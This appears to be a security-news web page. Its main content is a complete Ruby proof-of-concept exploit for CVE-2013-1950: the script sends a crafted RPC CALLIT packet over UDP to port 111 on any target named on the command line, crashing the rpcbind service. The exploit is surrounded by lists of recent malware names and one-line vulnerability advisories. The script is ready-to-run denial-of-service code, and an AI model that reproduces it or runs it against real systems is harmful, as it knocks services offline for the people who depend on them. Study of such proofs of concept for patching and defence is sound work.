The goal of this project is to make virtual world a safer and better place without child pornography, major computer crime and RIAA.
Login As
You can log in if you are registered at one of these services:
Security Bulletins
Latest Malware Updates

Infostealer.Posteal

02/26/2015

Downloader.Busadom

02/26/2015

Trojan.Ladocosm

02/26/2015

SONAR.SuspDocRun

02/25/2015

SONAR.SuspHelpRun

02/25/2015
07/16/2013

rpcbind (CALLIT Procedure) UDP Crash PoC

#!/usr/bin/ruby
#
#    rpcbind_udp_crash_poc.rb
#    07/15/2013
#    Sean Verity <veritysr1980 [at] gmail.com>
#    CVE 2013-1950
#
#    rpcbind (CALLIT Procedure) UDP Crash PoC
#    Affected Software Package: rpcbind-0.2.0-19
#
#    Tested on:
#    Fedora 17 (3.9.8-100.fc17.x86_64 #1 SMP)
#    CentOS 6.3 Final (2.6.32-279.22.1.el6.x86_64 #1 SMP)
#
#    rpcbind can be crashed by setting the argument length
#    value > 8944 in an RPC CALLIT procedure request over UDP.
#

require 'socket'

def usage
    abort "\nusage: ./rpcbind_udp_crash_poc.rb <target>\n\n"
end

if ARGV.length == 1
    pkt = [rand(2**32)].pack('N')    # XID
    pkt << [0].pack('N')            # Message Type: CALL (0)
    pkt << [2].pack('N')            # RPC Version: 2
    pkt << [100000].pack('N')        # Program: Portmap (100000)
    pkt << [2].pack('N')            # Program Version: 2
    pkt << [5].pack('N')            # Procedure: CALLIT (5)
    pkt << [0].pack('N')            # Credentials Flavor: AUTH_NULL (0)
    pkt << [0].pack('N')            # Length: 0
    pkt << [0].pack('N')            # Credentials Verifier: AUTH_NULL (0)
    pkt << [0].pack('N')            # Length: 0
    pkt << [0].pack('N')            # Program: Unknown (0)
    pkt << [1].pack('N')            # Version: 1
    pkt << [1].pack('N')            # Procedure: 1
    pkt << [8945].pack('N')            # Argument Length
    pkt << "crash"                    # Arguments

    s = UDPSocket.new
    s.send(pkt, 0, ARGV[0], 111)
else
    usage
end

Security Advisories Database

Remote Code Execution Vulnerability in Microsoft OpenType Font Driver

A remote attacker can execute arbitrary code on the target system.

07/21/2015

SQL Injection Vulnerability in Piwigo

SQL inection vulnerability has been discovered in Piwigo.

02/05/2015

Cross-site Scripting Vulnerability in DotNetNuke

A cross-site scripting (XSS) vulnerability has been discovered in DotNetNuke.

02/05/2015

Cross-site Scripting Vulnerability in Hitachi Command Suite

A cross-site scripting vulnerability was found in Hitachi Command Suite.

02/02/2015

Denial of service vulnerability in FreeBSD SCTP RE_CONFIG Chunk Handling

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Apache Traffic Server HTTP TRACE Max-Forwards

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in MalwareBytes Anti-Exploit &quot;mbae.sys&quot;

An attacker can perform a denial of service attack.

01/30/2015

Denial of service vulnerability in Linux Kernel splice

An attacker can perform a denial of service attack.

01/29/2015

Denial of service vulnerability in Python Pillow Module PNG Text Chunks Decompression

An attacker can perform a denial of service attack.

01/20/2015